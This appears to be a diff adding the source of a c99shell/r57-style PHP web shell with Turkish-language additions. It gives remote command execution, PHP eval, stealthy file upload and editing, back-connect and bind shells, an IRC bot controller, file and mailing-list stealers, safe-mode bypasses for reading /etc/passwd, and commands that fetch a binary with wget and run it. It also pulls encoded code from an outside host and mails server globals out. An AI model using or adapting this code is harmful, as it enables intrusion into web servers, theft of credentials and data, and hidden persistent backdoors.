".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; +if (!empty($fdbk_ref)) +{ +$tmp = @ob_get_contents(); +ob_clean(); +phpinfo(); +$phpinfo = base64_encode(ob_get_contents()); +ob_clean(); +echo $tmp; +$body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; +} +mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); +echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ + echo "Search in file-system:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { +$found = array(); +$found_d = 0; +$found_f = 0; +$search_i_f = 0; +$search_i_d = 0; +$a = array +( +"name"=>$search_name, "name_regexp"=>$search_name_regexp, +"text"=>$search_text, "text_regexp"=>$search_text_regxp, +"text_wwo"=>$search_text_wwo, +"text_cs"=>$search_text_cs, +"text_not"=>$search_text_not +); +$searchtime = getmicrotime(); +$in = array_unique(explode(";",$search_in)); +foreach($in as $v) {c99fsearch($v);} +$searchtime = round(getmicrotime()-$searchtime,4); +if (count($found) == 0) {echo "No files found!";} +else +{ +$ls_arr = $found; +$disp_fullpath = TRUE; +$act = "ls"; +} + } + echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else + { +$form = TRUE; +if ($chmod_submit) +{ +$octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); +if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} +else {$err = "Can't chmod to ".$octet.".";} +} +if ($form) +{ +$perms = parse_perms($mode); +echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; +} + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { +global $HTTP_POST_FILES; +$uploadfile = $HTTP_POST_FILES["uploadfile"]; +if (!empty($uploadfile["tmp_name"])) +{ +if (empty($uploadfilename)) {$destin = $uploadfile["name"];} +else {$destin = $userfilename;} +if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} +} +elseif (!empty($uploadurl)) +{ +if (!empty($uploadfilename)) {$destin = $uploadfilename;} +else +{ + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { +$i = 0; +$b = ""; +while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} +} +if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} +else +{ + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .="Can't download file!
    ";} + else + { +if ($filestealth) {$stat = stat($uploadpath.$destin);} +$fp = fopen($uploadpath.$destin,"w"); +if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} +else +{ +fwrite($fp,$content,strlen($content)); +fclose($fp); +if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} +} + } +} +} + } + if ($miniform) + { +echo "".$uploadmess.""; +$act = "ls"; + } + else + { +echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { +$result = FALSE; +$result = fs_rmobj($v); +if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + } + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { +$psterr = ""; +foreach($sess_data["copy"] as $k=>$v) +{ +$to = $d.basename($v); +if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} +if ($copy_unset) {unset($sess_data["copy"][$k]);} +} +foreach($sess_data["cut"] as $k=>$v) +{ +$to = $d.basename($v); +if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} +unset($sess_data["cut"][$k]); +} +c99_sess_put($sess_data); +if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} +$act = "ls"; + } + elseif ($actarcbuff) + { +$arcerr = ""; +if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} +else {$ext = ".tar.gz";} +if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} +$cmdline .= " ".$actarcbuff_path; +$objects = array_merge($sess_data["copy"],$sess_data["cut"]); +foreach($objects as $v) +{ +$v = str_replace("\\",DIRECTORY_SEPARATOR,$v); +if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} +if (is_dir($v)) +{ + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; +} +$cmdline .= " ".$v; +} +$tmp = realpath("."); +chdir($d); +$ret = myshellexec($cmdline); +chdir($tmp); +if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} +$ret = str_replace("\r\n","\n",$ret); +$ret = explode("\n",$ret); +if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} +foreach($sess_data["cut"] as $k=>$v) +{ +if (in_array($v,$ret)) {fs_rmobj($v);} +unset($sess_data["cut"][$k]); +} +c99_sess_put($sess_data); +if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} +$act = "ls"; + } + elseif ($actpastebuff) + { +$psterr = ""; +foreach($sess_data["copy"] as $k=>$v) +{ +$to = $d.basename($v); +if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} +if ($copy_unset) {unset($sess_data["copy"][$k]);} +} +foreach($sess_data["cut"] as $k=>$v) +{ +$to = $d.basename($v); +if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} +unset($sess_data["cut"][$k]); +} +c99_sess_put($sess_data); +if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} +$act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { +echo "Result of execution this command:
    "; +$olddir = realpath("."); +@chdir($d); +$ret = myshellexec($cmd); +$ret = convert_cyr_string($ret,"d","w"); +if ($cmd_txt) +{ +$rows = count(explode("\r\n",$ret))+1; +if ($rows < 10) {$rows = 10;} +echo "
    "; +} +else {echo $ret."
    ";} +@chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { +$list = array(); +if ($h = @opendir($d)) +{ +while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} +closedir($h); +} +else {} + } + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";} + else + { +//Building array +$objects = array(); +$vd = "f"; //Viewing mode +if ($vd == "f") +{ +$objects["head"] = array(); +$objects["folders"] = array(); +$objects["links"] = array(); +$objects["files"] = array(); +foreach ($list as $v) +{ + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { +if (is_link($v)) {$type = "LINK";} +else {$type = "DIR";} +$row[] = $v; +$row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { +$ow = posix_getpwuid(fileowner($v)); +$gr = posix_getgrgid(filegroup($v)); +$row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; +} +$row = array(); +$row[] = "Name"; +$row[] = "Size"; +$row[] = "Modify"; +if (!$win) +{$row[] = "Owner/Group";} +$row[] = "Perms"; +$row[] = "Action"; +$parsesort = parsesort($sort); +$sort = $parsesort[0].$parsesort[1]; +$k = $parsesort[0]; +if ($parsesort[1] != "a") {$parsesort[1] = "d";} +$y = ""; +$y .= "\"".($parsesort[1]"; +$row[$k] .= $y; +for($i=0;$i".$row[$i]."";} +} +$v = $parsesort[0]; +usort($objects["folders"], "tabsort"); +usort($objects["links"], "tabsort"); +usort($objects["files"], "tabsort"); +if ($parsesort[1] == "d") +{ + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); +} +$objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); +$tab = array(); +$tab["cols"] = array($row); +$tab["head"] = array(); +$tab["folders"] = array(); +$tab["links"] = array(); +$tab["files"] = array(); +$i = 0; +foreach ($objects as $a) +{ + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { +if (ereg($r[0],$o)) +{ +if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} +else +{ + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { +if (empty($r[2])) {$r[2] = ""; $r[3] = "";} +$disppath = $r[2].$disppath.$r[3]; +if ($r[4]) {break;} + } +} +} + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { +$row[] = " ".$o.""; +$row[] = "LINK"; + } + elseif ($o == "..") + { +$row[] = " ".$o.""; +$row[] = "LINK"; + } + elseif (is_dir($v)) + { +if (is_link($v)) +{ +$disppath .= " => ".readlink($v); +$type = "LINK"; +$row[] =" [".$disppath."]"; +} +else +{ +$type = "DIR"; +$row[] =" [".$disppath."]"; +} +$row[] = $type; + } + elseif(is_file($v)) + { +$ext = explode(".",$o); +$c = count($ext)-1; +$ext = $ext[$c]; +$ext = strtolower($ext); +$row[] =" ".$disppath.""; +$row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; +} +} +// Compiling table +$table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); +echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    "; +foreach($table as $row) +{ +echo "\r\n"; +foreach($row as $v) {echo "\r\n";} +echo "\r\n"; +} +echo "
    ".$v."

    + +   +"; +if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) +{ +echo "                   "; +} +echo " 

    "; +echo ""; + } +} +if ($act == "tools") +{ + + + + + + + ?> + + + + + + +

    :: Bind Functions By r57 ::

    +
    +
    +
    +Bind With Backd00r Burner


    +
    +
    + + +Back-Connection :
    Ip (default is your ip) :

    Port:


    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    + +
    +
    +
    + + +Irc Control©
    +
    Admin        
    IRC Server +
    +#Kanal       
    + BotNicki     
    + Bot_Yeri     
    +BotId          
    + IRCId          
    + +

    + + + + + + + +

    + +
    +
    + $ircadmin ,$ircserver a$irclabel ismi ile baglaniyorum"; + + } + + + + ?> + + + + + + + + + + + +

    :: File Stealer Function Ripped fRom Tontonq 's File Stealer ... ::

    +
    Error_Log SAfe Mode Bypass By Psych0 ;) +
    + +
    + "size=102> + + +
    + + + + + + + + + + + +
    + +
    +
    +
    + +Dosyanin Adresi ? =

    +Nereya Kaydolcak? = ">

    + +
    +


    + + + + +
    + +
    +
    + + + + + + +

    :: Preddy's tricks :D ::

    +
    Php Safe-Mode Bypass (Read Files) +

    +
    +
    +File:

    eg: /etc/passwd
    + + + + + + + +
    +
    +
    +
    +
    Php Safe-Mode Bypass (List Directories):
    +

    +Dir:

    eg: /etc/
    + +
    +
    + + + + + + + +

    :: Psych0 RulaZz ::

    +
    Useful Commands +
    +
    +
    + + + + +  + +
    +Warning. Kernel may be alerted using higher levels
    +
    +
    +
    :: ...Maillist Stealer ... :: + + +
    +         +
    +                  Db ismi
    +              Db Server
    +                 Db user
    +                 Db Pass
    + + + + +
    + + + +
    +

    + +Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...
    "; +} +if (!empty($_GET['dolma'])) +{ +$sayko=htmlspecialchars($_GET['dolma']); +if ($sayko == "wgetcan") +{ + +myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + + +} + +else if ($sayko =="freadcan") +{ +dosyayicek($adires,"sayko_bind"); +myshellexec("./sayko_bind"); +} + +else if ($sayko == "lynxcan") +{ +myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + +} + + + + + +} + +if(!empty($_POST['erorr']) || isset($_POST['erorr'])) +{ + +if (isset($_POST['c100y'])){ + +if +(error_log($_POST['erorr'], 3, "php://../../../../../../../../".$_POST['nere'])) +{ +echo "
    Dehset yazarim
    "; + +} + +else +{ + +echo "
    YAzamadim abi ....
    "; +} + +} + +else { +$c100c=base64_decode(dosyicek("http://sistemdata.be/base.txt")); + +if +(error_log($c100c, 3, "php://../../../../../../../../".$_POST['nere'])) +{ +echo "
    yazdim c100 u gir dait :D
    "; + +} + +else +{ + +echo "
    YAzamadim abi ....
    "; +} + + +} + + + + +} +} +if ($act == "processes") +{ + echo "Processes:
    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { +if (empty($processes_sort)) {$processes_sort = $sort_default;} +$parsesort = parsesort($processes_sort); +if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} +$k = $parsesort[0]; +if ($parsesort[1] != "a") {$y = "";} +else {$y = "";} +$ret = htmlspecialchars($ret); +if (!$win) +{ +if ($pid) +{ + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} +} +while (ereg("",$ret)) {$ret = str_replace(""," ",$ret);} +$stack = explode("\n",$ret); +$head = explode(" ",$stack[0]); +unset($stack[0]); +for($i=0;$i".$head[$i]."";} +} +$prcs = array(); +foreach ($stack as $line) +{ + if (!empty($line)) +{ + echo "
    "; +foreach($tab as $i=>$k) +{ +echo ""; +foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} +echo ""; +} +echo "
    ".$v."
    "; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { +echo "Result of execution this PHP-code:
    "; +$tmp = ob_get_contents(); +$olddir = realpath("."); +@chdir($d); +if ($tmp) +{ +ob_clean(); +eval($eval); +$ret = ob_get_contents(); +$ret = convert_cyr_string($ret,"d","w"); +ob_clean(); +echo $tmp; +if ($eval_txt) +{ + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; +} +else {echo $ret."
    ";} +} +else +{ +if ($eval_txt) +{ + echo "
    "; +} +else {echo $ret;} +} +@chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { +if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} +else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { +$r = @file_get_contents($d.$f); +$ext = explode(".",$f); +$c = count($ext)-1; +$ext = $ext[$c]; +$ext = strtolower($ext); +$rft = ""; +foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} +if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} +if (empty($ft)) {$ft = $rft;} +$arr = array( +array("","info"), +array("","html"), +array("","txt"), +array("Code","code"), +array("Session","phpsess"), +array("","exe"), +array("SDB","sdb"), +array("","img"), +array("","ini"), +array("","download"), +array("","notepad"), +array("","edit") +); +echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; +foreach($arr as $t) +{ +if ($t[1] == $rft) {echo " ".$t[0]."";} +elseif ($t[1] == $ft) {echo " ".$t[0]."";} +else {echo " ".$t[0]."";} +echo " (+) |"; +} +echo "
    "; +if ($ft == "info") +{ +echo "Information:"; +if (!$win) +{ + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); +} +echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; +$fi = fopen($d.$f,"rb"); +if ($fi) +{ + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} +$a1 .= "
    "; +$a2 .= "
    "; +} + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; +} +$encoded = ""; +if ($base64 == 1) +{ + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); +} +elseif($base64 == 2) +{ + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); +} +elseif($base64 == 3) +{ + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); +} +elseif($base64 == 4) +{ + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; +} +if (!empty($encoded)) +{ + echo "

    "; +} +echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; +} +elseif ($ft == "html") +{ +if ($white) {@ob_clean();} +echo $r; +if ($white) {c99shexit();} +} +elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} +elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";} +elseif ($ft == "phpsess") +{ +echo "
    "; 
    +$v = explode("|",$r); 
    +echo $v[0]."
    "; +var_dump(unserialize($v[1])); +echo "
    "; +} +elseif ($ft == "exe") +{ +$ext = explode(".",$f); +$c = count($ext)-1; +$ext = $ext[$c]; +$ext = strtolower($ext); +$rft = ""; +foreach($exeftypes as $k=>$v) +{ + if (in_array($ext,$v)) {$rft = $k; break;} +} +$cmd = str_replace("%f%",$f,$rft); +echo "Execute file:

    Display in text-area
    "; +} +elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} +elseif ($ft == "code") +{ +if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) +{ + $arr = explode("\n",$r); + if (count($arr == 18)) + { +include($d.$f); +echo "phpBB configuration is detected in this file!
    "; +if ($dbms == "mysql4") {$dbms = "mysql";} +if ($dbms == "mysql") {echo "Connect to DB

    ";} +else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} +echo "Parameters for manual connect:
    "; +$cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); +foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} +echo "

    "; + } +} +if (ereg("// Number of this Forum",$r)) +{ + $arr = explode("\n",$r); + if (count($arr == 18)) + { +include($d.$f); +echo "phpBB configuration is detected in this file!
    "; +if ($dbms == "mysql4") {$dbms = "mysql";} +if ($dbms == "mysql") {echo "Connect to DB

    ";} +else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} +echo "Parameters for manual connect:
    "; +$cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); +foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} +echo "

    "; + } +} + + + +echo "
    "; +if (!empty($white)) {@ob_clean();} +highlight_file($d.$f); +if (!empty($white)) {c99shexit();} +echo "
    "; +} +elseif ($ft == "download") +{ +@ob_clean(); +header("Content-type: application/octet-stream"); +header("Content-length: ".filesize($d.$f)); +header("Content-disposition: attachment; filename=\"".$f."\";"); +echo $r; +exit; +} +elseif ($ft == "notepad") +{ +@ob_clean(); +header("Content-type: text/plain"); +header("Content-disposition: attachment; filename=\"".$f.".txt\";"); +echo($r); +exit; +} +elseif ($ft == "img") +{ +$inf = getimagesize($d.$f); +if (!$white) +{ + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { +echo ""; +if ($imgsize != $v ) {echo $v;} +else {echo "".$v."";} +echo "   "; + } + echo "

    "; +} +else +{ + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; +} +} +elseif ($ft == "edit") +{ +if (!empty($submit)) +{ + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { +echo "Saved!"; +fwrite($fp,$edit_text); +fclose($fp); +if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} +$r = $edit_text; + } +} +$rows = count(explode("\r\n",$r)); +if ($rows < 10) {$rows = 10;} +if ($rows > 30) {$rows = 30;} +echo "
      
    "; +} +elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} +else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"Success"=> +"R0lGODlhGgAVAPcAAKHMn/v7+8/Pz+7u7me3Ytjs1kurRXi/c9bW1vLy8sznyt/f31myVD+l +OOXz5fL58rzguuLi4jOgLMzMzP///wwAAAAAGgAVAAAI8gApCBwoMEAEBBMSTkAQIQAF +BQckECBIkUIEhRgVEpDA0UDFgggnCIgwIEGCAREANODI8iOFkAscEnSwkiXHjxcnDKj4gIFN +CQcgVAyQcMFHADYbAJggk+BFAQUqKvhZIGGEiggjNDAgdOBGlgAsLqyYECnHAw8e2pxIYUBC +ikQnfOXIwMFcCQ4EJnhLMG5Nln+BDtw7geyECBF/sowq0G1hilkpQAhM1+lYik8dFlDclUIA +AYeHFhVolmVagQsSNrWsU6ABlgwGOr7qEmaAAgpyRw2Q+rLLACFHljwZAfTC1S5zZlRI2yXc +gxgZIndOnXpAADs=", +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", + +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 